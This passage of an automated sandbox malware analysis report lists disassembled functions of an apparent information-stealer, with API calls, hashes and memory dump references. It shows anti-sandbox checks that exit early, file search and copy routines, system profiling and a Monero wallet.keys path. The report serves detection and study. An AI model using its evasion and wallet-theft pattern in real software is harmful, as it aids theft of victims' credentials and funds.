Part of subcall function 00AC8680: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00AD05B7), ref: 00AC86CA
Part of subcall function 00AC8680: Process32First.KERNEL32(?,00000128), ref: 00AC86DE
Part of subcall function 00AC8680: Process32Next.KERNEL32(?,00000128), ref: 00AC86F3
Part of subcall function 00AC8680: CloseHandle.KERNEL32(?), ref: 00AC8761

lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 00AC265B

Strings

^, xrefs: 00AC22D5
H^, xrefs: 00AC1C6A
h^, xrefs: 00AC2054

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: Heap$Process$Allocate$Closewsprintf$NameOpenlstrcpy$InformationLocal$CurrentHandleInfoKeyboardLayoutListLocaleProcess32StatusSystemTimeUser__aulldivlstrcatlstrlen$AllocComputerCreateDefaultDirectoryEnumErrorFileFirstFreeGlobalLastLogicalMemoryModuleNextPowerProcessorQuerySnapshotToolhelp32ValueVolumeWindowsWow64Zone
String ID: H^$h^$^
API String ID: 3113730047-44832411
Opcode ID: 7a57624c155542dd20af60d6051299a3aa5f90ff9cbd7e360a0f956f3c4f8c00
Instruction ID: c38cd27969e06c05975251ce40e4ddf411976242ec7659b5c0449e09d8ddc895
Opcode Fuzzy Hash: 7a57624c155542dd20af60d6051299a3aa5f90ff9cbd7e360a0f956f3c4f8c00
Instruction Fuzzy Hash: AF722C7291011CABDB19FB90DD92FFEB338AF64304F52469DB51662051EF302B49CB66

Function 00AC4BB0 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 118stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00AC8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00AC8E0B

lstrcat.KERNEL32(?,00000000), ref: 00AC4BEA
lstrcat.KERNEL32(?,005EE028), ref: 00AC4C08

Part of subcall function 00AC4910: wsprintfA.USER32 ref: 00AC492C
Part of subcall function 00AC4910: FindFirstFileA.KERNEL32(?,?), ref: 00AC4943

Part of subcall function 00AC4910: StrCmpCA.SHLWAPI(?,00AD0FDC), ref: 00AC4971
Part of subcall function 00AC4910: StrCmpCA.SHLWAPI(?,00AD0FE0), ref: 00AC4987
Part of subcall function 00AC4910: FindNextFileA.KERNEL32(000000FF,?), ref: 00AC4B7D
Part of subcall function 00AC4910: FindClose.KERNEL32(000000FF), ref: 00AC4B92

Part of subcall function 00AC4910: wsprintfA.USER32 ref: 00AC49B0
Part of subcall function 00AC4910: StrCmpCA.SHLWAPI(?,00AD08D2), ref: 00AC49C5
Part of subcall function 00AC4910: wsprintfA.USER32 ref: 00AC49E2
Part of subcall function 00AC4910: PathMatchSpecA.SHLWAPI(?,?), ref: 00AC4A1E
Part of subcall function 00AC4910: lstrcat.KERNEL32(?,005EFA80), ref: 00AC4A4A
Part of subcall function 00AC4910: lstrcat.KERNEL32(?,00AD0FF8), ref: 00AC4A5C
Part of subcall function 00AC4910: lstrcat.KERNEL32(?,?), ref: 00AC4A70
Part of subcall function 00AC4910: lstrcat.KERNEL32(?,00AD0FFC), ref: 00AC4A82
Part of subcall function 00AC4910: lstrcat.KERNEL32(?,?), ref: 00AC4A96
Part of subcall function 00AC4910: CopyFileA.KERNEL32(?,?,00000001), ref: 00AC4AAC
Part of subcall function 00AC4910: DeleteFileA.KERNEL32(?), ref: 00AC4B31

Part of subcall function 00AC4910: wsprintfA.USER32 ref: 00AC4A07

Strings

(^, xrefs: 00AC4BFB
^, xrefs: 00AC4C49
(^, xrefs: 00AC4CEA
h^, xrefs: 00AC4D1F

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID: (^$(^$h^$^
API String ID: 2104210347-1794354958
Opcode ID: d71da79deedca14973feba251e80df8143fe82cea378d2e6e37be095be2eecd1
Instruction ID: da953d249aade5a92f6c993d101ecfae630828ce2a7e7f30b2a7a426497a06a0
Opcode Fuzzy Hash: d71da79deedca14973feba251e80df8143fe82cea378d2e6e37be095be2eecd1
Instruction Fuzzy Hash: F241C4B69001046BC754FBA0ED52FFE733DA788740F40890CB54A56196ED75AB8CCBA3

Function 00AC69F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00AC9860: GetProcAddress.KERNEL32(76210000,005E1660), ref: 00AC98A1
Part of subcall function 00AC9860: GetProcAddress.KERNEL32(76210000,005E1678), ref: 00AC98BA
Part of subcall function 00AC9860: GetProcAddress.KERNEL32(76210000,005E1648), ref: 00AC98D2
Part of subcall function 00AC9860: GetProcAddress.KERNEL32(76210000,005E1540), ref: 00AC98EA
Part of subcall function 00AC9860: GetProcAddress.KERNEL32(76210000,005E17F8), ref: 00AC9903
Part of subcall function 00AC9860: GetProcAddress.KERNEL32(76210000,005E8A48), ref: 00AC991B
Part of subcall function 00AC9860: GetProcAddress.KERNEL32(76210000,005D6A00), ref: 00AC9933
Part of subcall function 00AC9860: GetProcAddress.KERNEL32(76210000,005D6940), ref: 00AC994C
Part of subcall function 00AC9860: GetProcAddress.KERNEL32(76210000,005E1708), ref: 00AC9964
Part of subcall function 00AC9860: GetProcAddress.KERNEL32(76210000,005E1570), ref: 00AC997C
Part of subcall function 00AC9860: GetProcAddress.KERNEL32(76210000,005E17B0), ref: 00AC9995
Part of subcall function 00AC9860: GetProcAddress.KERNEL32(76210000,005E16C0), ref: 00AC99AD
Part of subcall function 00AC9860: GetProcAddress.KERNEL32(76210000,005D6780), ref: 00AC99C5
Part of subcall function 00AC9860: GetProcAddress.KERNEL32(76210000,005E1588), ref: 00AC99DE

Part of subcall function 00ACA740: lstrcpy.KERNEL32(00AD0E17,00000000), ref: 00ACA788

Part of subcall function 00AB11D0: ExitProcess.KERNEL32 ref: 00AB1211

Part of subcall function 00AB1160: GetSystemInfo.KERNEL32(?), ref: 00AB116A
Part of subcall function 00AB1160: ExitProcess.KERNEL32 ref: 00AB117E

Part of subcall function 00AB1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00AB112B
Part of subcall function 00AB1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00AB1132
Part of subcall function 00AB1110: ExitProcess.KERNEL32 ref: 00AB1143

Part of subcall function 00AB1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00AB123E
Part of subcall function 00AB1220: __aulldiv.LIBCMT ref: 00AB1258
Part of subcall function 00AB1220: __aulldiv.LIBCMT ref: 00AB1266
Part of subcall function 00AB1220: ExitProcess.KERNEL32 ref: 00AB1294

Part of subcall function 00AC6770: GetUserDefaultLangID.KERNEL32 ref: 00AC6774

Part of subcall function 00AB1190: ExitProcess.KERNEL32 ref: 00AB11C6

Part of subcall function 00AC7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00AB11B7), ref: 00AC7880
Part of subcall function 00AC7850: RtlAllocateHeap.NTDLL(00000000), ref: 00AC7887
Part of subcall function 00AC7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00AC789F

Part of subcall function 00AC78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00AC7910
Part of subcall function 00AC78E0: RtlAllocateHeap.NTDLL(00000000), ref: 00AC7917
Part of subcall function 00AC78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00AC792F

Part of subcall function 00ACA9B0: lstrlen.KERNEL32(?,005E8CA8,?,\Monero\wallet.keys,00AD0E17), ref: 00ACA9C5
Part of subcall function 00ACA9B0: lstrcpy.KERNEL32(00000000), ref: 00ACAA04
Part of subcall function 00ACA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00ACAA12

Part of subcall function 00ACA8A0: lstrcpy.KERNEL32(?,00AD0E17), ref: 00ACA905

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,005E8988,?,00AD110C,?,00000000,?,00AD1110,?,00000000,00AD0AEF), ref: 00AC6ACA
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00AC6AE8
CloseHandle.KERNEL32(00000000), ref: 00AC6AF9
Sleep.KERNEL32(00001770), ref: 00AC6B04
CloseHandle.KERNEL32(?,00000000,?,005E8988,?,00AD110C,?,00000000,?,00AD1110,?,00000000,00AD0AEF), ref: 00AC6B1A
ExitProcess.KERNEL32 ref: 00AC6B22

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
String ID:
API String ID: 2525456742-0
Opcode ID: 8f4d6858b94ca6d6a00fb1442a07f0b78a6df851c1051380820826e2b35bf990
Instruction ID: 142c0848a4c5ad331a98323c99879f915da8303bff97180524d31fd4b56ff7d6
Opcode Fuzzy Hash: 8f4d6858b94ca6d6a00fb1442a07f0b78a6df851c1051380820826e2b35bf990
Instruction Fuzzy Hash: AE31FA71A00208ABDB04FBA0DE56FFEB778AF14344F51451DF212A6192DF706905CBA6

Function 00AB99C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00AB99EC
GetFileSizeEx.KERNEL32(000000FF,?), ref: 00AB9A11
LocalAlloc.KERNEL32(00000040,?), ref: 00AB9A31
ReadFile.KERNEL32(000000FF,?,00000000,00AB148F,00000000), ref: 00AB9A5A
LocalFree.KERNEL32(00AB148F), ref: 00AB9A90
CloseHandle.KERNEL32(000000FF), ref: 00AB9A9A

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: File$Local$AllocCloseCreateFreeHandleReadSize
String ID:
API String ID: 2311089104-0
Opcode ID: 9855cdb233037b46a64e4a9e00b55ca37b59ebc4fab5a1099e18bd6ad085f19d
Instruction ID: 97c7bc99443fe8cf4b11eaf2045089a3b711e802476e580ba88737223ac89704
Opcode Fuzzy Hash: 9855cdb233037b46a64e4a9e00b55ca37b59ebc4fab5a1099e18bd6ad085f19d
Instruction Fuzzy Hash: E5310AB4A00209EFDB14DF95C985FEEB7B9FF48740F108158E915A7290D778AA42CFA1

Function 00AB1220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00AB123E
__aulldiv.LIBCMT ref: 00AB1258
__aulldiv.LIBCMT ref: 00AB1266
ExitProcess.KERNEL32 ref: 00AB1294

Strings

@, xrefs: 00AB1233

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: __aulldiv$ExitGlobalMemoryProcessStatus
String ID: @
API String ID: 3404098578-2766056989
Opcode ID: bcabb3dc28c99e8fdc11deba36eda183778cce4b1d95c18a21befbc37bdb1658
Instruction ID: c15f20e2bf7f48052c6cd69bb97f0f670561b4f5c8333e9907437eb92016196b
Opcode Fuzzy Hash: bcabb3dc28c99e8fdc11deba36eda183778cce4b1d95c18a21befbc37bdb1658
Instruction Fuzzy Hash: 9A014BB0940308AAEB10EBE0CC49BEEBB78AB04741F608068E605B6281D6B466418799

Function 6CAEC930 Relevance: 7.6, APIs: 5, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 6CAEC947
VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6CAEC969
GetSystemInfo.KERNEL32(?), ref: 6CAEC9A9
VirtualFree.KERNEL32(00000000,?,00008000), ref: 6CAEC9C8
VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6CAEC9E2

Memory Dump Source

Source File: 00000000.00000002.2456589135.000000006CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAD0000, based on PE: true

Associated: 00000000.00000002.2456560223.000000006CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456636137.000000006CB4D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456651859.000000006CB5E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456666418.000000006CB62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cad0000_file.jbxd

Similarity

API ID: Virtual$AllocInfoSystem$Free
String ID:
API String ID: 4191843772-0
Opcode ID: 0eab274a3eff6298d205604007e79a42363443a5516e77b16b071687f20fb5d4
Instruction ID: 1613cef470aeef8597951b0f085038bed967f093e170f35c330a2cf3b3c8010e
Opcode Fuzzy Hash: 0eab274a3eff6298d205604007e79a42363443a5516e77b16b071687f20fb5d4
Instruction Fuzzy Hash: EA21FC317412186BDB05AFA4DC84BAEBBB9AB4A708F94051DF903A7780EB705C4487E1

Function 00AC7E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00AC7E37
RtlAllocateHeap.NTDLL(00000000), ref: 00AC7E3E
RegOpenKeyExA.KERNEL32(80000002,005DB7A0,00000000,00020119,?), ref: 00AC7E5E
RegQueryValueExA.KERNEL32(?,005EE308,00000000,00000000,000000FF,000000FF), ref: 00AC7E7F
RegCloseKey.ADVAPI32(?), ref: 00AC7E92

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
